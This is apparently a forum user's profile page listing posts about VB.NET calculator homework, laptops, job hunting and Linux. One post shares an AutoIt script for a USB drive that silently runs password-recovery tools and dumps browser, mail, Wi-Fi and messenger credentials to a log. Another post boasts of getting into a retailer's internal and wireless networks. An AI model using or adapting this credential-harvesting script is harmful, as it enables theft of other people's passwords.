Jump to content

angelictorment

Active Members
  • Posts

    58
  • Joined

  • Last visited

Contact Methods

  • Website URL
    http://mousewareinc.surfs.it
  • ICQ
    0

Profile Information

  • Location
    Sebastian,Fl (Hell if you ask me)

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

angelictorment's Achievements

Newbie

Newbie (1/14)

  1. You forgot a few "words" there. 1.clumbzy ( I believe this is s'ppose to be Clumzy ) 2. difrent ( Could this be Different? ) 3. Not really a few words, but more of one GIANT run on, hell where does it begin and end at really? "did u git the case form a difrent laptop , or is that the compny that makes epc, my sister wants a laptop for her birthday , my dad dusnt want 2 git her a big one cuz she is clumbzy , ar epcs a durable" LoL! Is this what they teach in school now? I remember if I would talk or even spell like this I would have to write the correct sentence on the chalk board until the next morning. Kind of like Bart Simpson does, I guess this is what the world is coming to now, sad really.
  2. The EEEPC is made by Asus, they are basically small laptops that are made for internet and email browsing. They can be used for other things, like running linux and BT3 for penetration testing purposes. Not sure how durable they are as the reviews I've read on them arent that great as far as that goes.
  3. LoL! I really hate to restart an old topic. But I've been messing with AutoIT and one of my u3 drives for work. Well I wanted to make it easier to obtain passwords off of our networks and our clients networks when we are working on them. Anyhow I pulled out the old script and blew the dust off of it so to speak. Well now I can't get it to run right... Here is the code I'm using, maybe someone can point to me the error that I'm just not seeing. Any and all help is appreciated. The error I keep rec'n is Line 1: Run(@ComSpec & '/k "pspv.exe /stext .takepspv.txt"', @ScriptDir, @SW_HIDE) Error: Unknown Command. Run(@ComSpec & ' /k "pspv.exe /stext .takepspv.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "WirelessKeyView.exe /stext .takeWireless.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "mspass.exe /stext .takemspass.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "mailpv.exe /stext .takemailpv.txt"', @ScriptDir, @SW_HIDE) sleep(200) Run(@ComSpec & ' /k "iepv.exe /stext .takeiepass.txt"', @ScriptDir, @SW_HIDE) sleep(3000) Run(@ComSpec & ' /k "COPY .take*.txt .takeall.txt"', @ScriptDir, @SW_HIDE) sleep(3000) Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & "-" & @HOUR & "-" & @MIN & "_" & @SEC Dim $Location = @WorkingDir & '.take' Dim $FileName = "all.txt" FileMove($Location & $FileName , $Location & $DateTime & ".log",1) sleep(3000) Run(@ComSpec & ' /k "del .take*.txt"', @ScriptDir, @SW_HIDE) sleep(1000) Run(@ComSpec & ' /k "process.exe -k cmd.exe"', @ScriptDir, @SW_HIDE) sleep(1000)
  4. Well no, I just need some pointers and some input is all and a litl help along the way. This class I'm in is only 5 weeks long. Crash courses suck a$$ is all... Just wait for this next project, I think I have it done already though, I haven't tested it yet. Decimal to Binary Converter. But I'd also like to take it one step further and convert Binary to Decimal. Anyhow thanx for the help Psycho.... jool- I think I get what your saying. Thank you also...
  5. At the current moment I'm running a gaming system using the P5N32 SLI Deluxe from Asus. I've had no problems with it since I've had it, nor downloading drivers from them. I don't know about integrated graphics though, as I've never dealt with them except with my laptop. So I'm of no help there, but I'd go with either Asus, or eVGA is s'ppose to make a nice motherboard for the Conroe processor.
  6. Ok now I have this issue... But first. Ok everyone, wanted to say thanx for the links and the guidance. Now here is the rest of my issue. See code below. I need to find out how to get these numbers to also display in lstBox2 along with the symbols for + - * and /. Also need to know how to make it total everything up. Like what we have to do is 9+9 in lstBox2 and to get the answer I'd have to hit +,-,*, or / to make it show 9+9=19/ Since there is no equals key for this type of calculator. HELP please... Now for the code. Public Class frmCalculator Inherits System.Windows.Forms.Form Dim total1 As Integer Dim total2 As Integer Private Sub btnOne_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnOne.Click txtDisplay.Text = txtDisplay.Text & btnOne.Text End Sub Private Sub btnTwo_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnTwo.Click txtDisplay.Text = txtDisplay.Text & btnTwo.Text End Sub Private Sub cmdExit_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdExit.Click End End Sub Private Sub btnZero_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnZero.Click txtDisplay.Text = txtDisplay.Text & btnZero.Text End Sub Private Sub btnThree_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnThree.Click txtDisplay.Text = txtDisplay.Text & btnThree.Text End Sub Private Sub btnFour_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnFour.Click txtDisplay.Text = txtDisplay.Text & btnFour.Text End Sub Private Sub btnFive_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnFive.Click txtDisplay.Text = txtDisplay.Text & btnFive.Text End Sub Private Sub btnSix_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSix.Click txtDisplay.Text = txtDisplay.Text & btnSix.Text End Sub Private Sub btnSeven_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSeven.Click txtDisplay.Text = txtDisplay.Text & btnSeven.Text End Sub Private Sub btnEight_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnEight.Click txtDisplay.Text = txtDisplay.Text & btnEight.Text End Sub Private Sub btnNine_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnNine.Click txtDisplay.Text = txtDisplay.Text & btnNine.Text End Sub Private Sub btnPlus_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnPlus.Click total1 = total1 + Val(lstBox2.Text) txtDisplay.Clear() End Sub Private Sub cmdClear_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdClear.Click txtDisplay.Clear() End Sub Private Sub btnSubtract_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSubtract.Click total1 = total1 - Val(lstBox2.Text) txtDisplay.Clear() End Sub Private Sub btnMultiply_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnMultiply.Click total1 = total1 * Val(lstBox2.Text) txtDisplay.Clear() End Sub Private Sub btnDivide_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnDivide.Click total1 = total1 / Val(lstBox2.Text) txtDisplay.Clear() End Sub Private Sub cmdClearList_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdClearList.Click lstBox2.ClearSelected() End Sub End Class
  7. Ok, thanx... :) Lets try and see then I can finish adding the rest of the code I hope.
  8. In the class definition? Hmmm... example please this is week 1 of VB for me... Also the error underlines all the lines.
  9. Ok I have to code an RPN Calculator for class for my Introduction to VB .NET Class. I've been trying to get this stupid thing to work for the past few days and I keep having issues. First I get this error "Statement not valid in a namespace." I can't find any help on this. Here is part of the coding please help. Thank You! Public Class frmCalculator Inherits System.Windows.Forms.Form Dim total1 As Integer Dim total2 As Integer End Class Private Sub btnOne_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnOne.Click txtDisplay.Text = btnOne.Text End Sub Private Sub btnTwo_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnTwo.Click txtDisplay.Text = btnTwo.Text End Sub Private Sub cmdExit_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles cmdExit.Click End End Sub Private Sub btnZero_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnZero.Click txtDisplay.Text = btnZero.Text End Sub Private Sub btnThree_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnThree.Click txtDisplay.Text = btnThree.Text End Sub Private Sub btnFour_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnFour.Click txtDisplay.Text = btnFour.Text End Sub Private Sub btnFive_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnFive.Click txtDisplay.Text = btnFive.Text End Sub Private Sub btnSix_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSix.Click txtDisplay.Text = btnSix.Text End Sub Private Sub btnSeven_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSeven.Click txtDisplay.Text = btnSeven.Text End Sub Private Sub btnEight_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnEight.Click txtDisplay.Text = btnEight.Text End Sub Private Sub btnNine_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnNine.Click txtDisplay.Text = btnNine.Text End Sub
  10. I'm of all mixes but I'm not from Ireland so I'm of no help to ya... I'm French, Italian, German, Russian, Scotch, Irish, Cheerokee Indian
  11. I'm getting 7$/hr and no tips... grrrrrrrrrr
  12. LoL! Which company was that for? Cause WalMart used Java for they're quiz. Which was kind of silly cause when they first put the stupid computer thing... Well the thing that they call a computer in there it didn't have Sun Java on it. I went to start to do the questionaire thing and it said that java was required blah blah blah. I laughed and said out loud WTF?!?! is this a computer test for me to see if I know anything about computers or is this just something stupid that the corp. office forgot to install. Well come to find out it was neither. It was the stupid vendor that puts those in that forgot to set it up properly. But what was cool about it was the fact that with out java on it, you could view the rest of the stores network with it and see the tracking, billing and what not with it. Only cause with out java the questionaire screen wouldn't be up, so anyone could access anything. Any whats more stupid with walmart is I can get into they're wireless network out in the parking lot with my lappy with out even trying... Its "secured" the morons used the WEP or the WPA key as the wireless identifier... MORONS!
  13. Sparda your pretty much spot on with the "Can we trust" part. Those personality tests are the stupidest things I've ever seen here in the States. It took me 4 months here in Orlando to find a job since I moved here from a different part of Florida. Anyhow they ask stupid questions on the applications like "Do you like to work alone?"or "Are you willing to work overtime when needed?"or even "If you wittnessed a coworker taking something that they didn't pay for would you report it or leave it be?" Some of them even go as far as "Do you participate in extreme sports or activities?" And then they go as far as rewording the exact same questions to try and catch you lying on the whole thing. Its about the stupidest thing I've ever seen. Hell I was just denied a job with the Harley Davidson Company because my CREDIT score was too low. WTF?!?!?! My credit score wouldn't be low if I had a job to keep it up... DUH!
  14. Its just as bad trying to find a job here in the states. I live in Florida and ever since the hurricanes of 04 swept through all the jobs have been taken over by immigrants that will work for less than min wage like VAKO said. It kills us the students when we need jobs to pay for books, and supplies and what nots. Not to mention most of the IT jobs around here want 5+ yrs experience... I'm thinking WTF?!?!?! I'm 25 been building PC's since I was 13... How much more experience do I need, not to mention I run my own PC repair business around here. But thats not working to well either... I ended up getting a job at the Discovery Channel Store in a ritzy mall. Its not much but it does fill the pockets.
  15. I haven't tried ubuntu linux yet. I've just worked with Fedora Core, Redhat, and SuSE. Speaking of broadening horizons of linux. How is yellow dog? I'm thinking of going for debian next I'm not sure yet though.
×
×
  • Create New...